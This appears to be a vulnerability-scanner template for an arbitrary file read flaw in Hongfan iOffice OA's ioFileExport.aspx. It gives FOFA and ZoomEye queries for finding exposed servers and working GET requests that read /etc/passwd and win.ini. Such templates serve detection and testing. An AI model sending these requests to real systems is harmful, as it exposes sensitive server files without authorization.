漏洞描述
红帆OA ioFileExport.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器敏感信息
FOFA: app="红帆-ioffice"
ZoomEye: app:"红帆 ioffice"
id: ioffice-oa-iofileexport-read-file
info:
name: 红帆OA ioFileExport.aspx 任意文件读取漏洞
author: zan8in
severity: high
verified: true
description: |
红帆OA ioFileExport.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器敏感信息
FOFA: app="红帆-ioffice"
ZoomEye: app:"红帆 ioffice"
tags: ioffice,hongfan,fileread
created: 2023/10/27
rules:
r0:
request:
method: GET
path: /iOffice/prg/set/iocom/ioFileExport.aspx?url=/etc/passwd&filename=test.txt&ContentType=application/octet-stream
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
r1:
request:
method: GET
path: /iOffice/prg/set/ioCom/ioFileExport.aspx?url=C:/Windows/win.ini
expression: response.status == 200 && response.body.bcontains(b"bit app support") && response.body.bcontains(b"fonts") && response.body.bcontains(b"extensions")
expression: r0() || r1()